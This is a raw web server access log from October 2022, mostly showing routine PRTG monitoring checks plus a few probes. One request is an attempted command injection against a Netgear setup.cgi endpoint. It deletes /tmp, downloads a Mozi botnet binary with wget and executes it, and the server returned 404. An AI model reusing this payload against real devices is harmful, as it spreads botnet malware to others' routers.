212.91.246.72 - - [03/Oct/2022:20:46:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
78.142.18.92 - - [03/Oct/2022:20:47:05 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
212.91.246.72 - - [03/Oct/2022:20:47:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:48:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:49:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:50:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:51:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:52:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.47.141.88 - - [03/Oct/2022:20:53:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [03/Oct/2022:20:53:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
91.166.59.96 - - [03/Oct/2022:20:53:48 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 310 "-" "-"
212.91.246.72 - - [03/Oct/2022:20:54:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:55:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:56:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:57:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.131.66.209 - - [03/Oct/2022:20:58:05 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/Oct/2022:20:58:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:59:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
